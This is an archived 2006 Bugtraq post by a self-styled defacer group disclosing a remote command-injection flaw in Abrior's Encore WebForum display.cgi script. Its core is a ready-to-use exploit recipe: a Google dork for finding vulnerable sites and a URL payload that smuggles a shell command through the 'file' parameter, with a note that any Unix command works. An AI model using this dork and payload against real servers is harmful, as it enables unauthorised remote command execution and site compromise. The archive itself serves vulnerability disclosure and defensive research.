lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060620092803.26973.qmail@securityfocus.com> Date: 20 Jun 2006 09:28:03 -0000 From: soltan_defacer@...oo.com To: bugtraq@...urityfocus.com Subject: display.cgi #################### Azhteam Digital Security Team ###################### ############################################## Abrior's Encore WebForum ( display.cgi ) Find by : soltan_defacer www.azhteam.com # Greetings; s.defacer - azhteam - lvl3hr - edi.programe ############################################## Bugs File : /forumcgi/display.cgi? Display : http://www.target.com/encore/forumcgi/display.cgi? 1. search in Google --> allinurl:forumcgi/display.cgi? 2. Get the target site like --> http://www.target.com/encore/forumcgi/display.cgi?preftemp=temp 3. and now go to the exploit with insert this code : &page=anonymous&file=|uname%20-a| 4. Full Display like : http://www.target.com/encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=|uname%20-a| 5. Linux or Unix command available in here... Good Luck :P~ #################### Azhteam Digital Security Team ######################